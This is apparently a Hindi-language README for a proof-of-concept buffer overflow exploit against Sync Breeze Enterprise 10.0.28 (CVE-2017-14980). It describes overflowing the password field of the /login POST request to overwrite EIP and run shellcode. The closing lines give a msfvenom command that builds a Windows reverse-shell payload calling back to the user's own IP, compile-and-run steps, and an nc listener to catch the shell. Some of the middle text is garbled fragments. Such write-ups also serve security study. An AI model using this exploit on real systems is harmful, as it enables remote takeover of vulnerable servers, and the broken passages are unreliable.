
Sync Breeze Enterprise v10.0.28 (CVE-2017-14980) के लिए प्रूफ-ऑफ-कॉन्सेप्ट बफर ओवरफ्लो एक्सप्लॉइट। अनुकूलित HTTP POST पेलोड भेजता है जो EIP को ओवरराइट करता है और कस्टम x86 शेलकोड निष्पादित करता है ताकि आर्बिट्ररी कोड निष्पादन हो सके।
इस रिपॉजिटरी में Sync Breeze Enterprise संस्करण 10.0.28 के लिए बफर ओवरफ्लो एक्सप्लॉइट (BOF) का एक प्रूफ-ऑफ-कॉन्सेप्ट शामिल है, जो CVE-2017-14980 के रूप में पहचानी गई भेद्यता को लक्षित करता है।
यह भेद्यता /login एंडपॉइंट पर POST अनुरोध में password फ़ील्ड को संसाधित करते समय अनुचित इनपुट सत्यापन के कारण मौजूद है।
कोई हमलावर इस फ़ील्ड में अत्यधिक लंबा मान भेज सकता है, जो EIP को ओवरराइट करता है और मनमाना कोड निष्पादन की अनुमति देता है।
यह एक्सप्लॉइट सावधानीपूर्वक तैयार किए गए पेलोड को भेजता है जिसमें शामिल हैं:
'A')password फ़ील्ड में डालते हुए भेद्य सर्वर को एक HTTP POST अनुरोध भेजता है।gcc)\x83\x0C\x09\x10) और यदि आवश्यक हो तो शेलकोड का समायोजनmsfvenom के साथ शेलकोड उत्पन्न करने का उदाहरण:
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
gcc exploit.c -o exploit
./exploit
nc -nlvp 4444